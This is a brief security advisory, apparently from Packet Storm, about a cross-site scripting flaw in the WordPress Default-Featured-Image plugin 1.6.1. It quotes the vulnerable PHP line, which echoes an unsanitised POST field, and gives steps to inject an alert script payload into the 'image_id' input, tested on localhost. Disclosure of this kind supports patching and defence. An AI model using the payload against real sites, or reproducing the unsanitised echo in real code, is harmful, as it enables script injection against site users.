WordPress Default-Featured-Image 1.6.1 Cross Site Scripting

WordPress Default-Featured-Image plugin version 1.6.1 suffers from a cross site scripting vulnerability.

MD5 | fa36d419a2d012220c89380ac0ed0eb5

Download

[-] Title  : word press plugin default-featured-image 1.6.1 - Cross Site
Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/default-featured-image/
[-] Category : Webapps
[-] Date : 2020-02-17
==============================================================================================
Vulnerable Page:
default-featured-image/set-default-featured-image.php
==============================================================================================
Vulnerable Source:
174: echo echo $this->preview_image($_POST['image_id']);
===============================================================================================
POC :
http://localhost/wp-content/plugins/default-featured-image/set-default-featured-image.php

step 1 = Go To Web Page =
http://localhost/wp-content/plugins/default-featured-image/set-default-featured-image.php

Step 2 = In the box : "image_id"

Step 3 = input box , Add JavaScript Code : <script>alert('XSS')</script>
===============================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : [email protected]
************************

Source: packetstormsecurity.com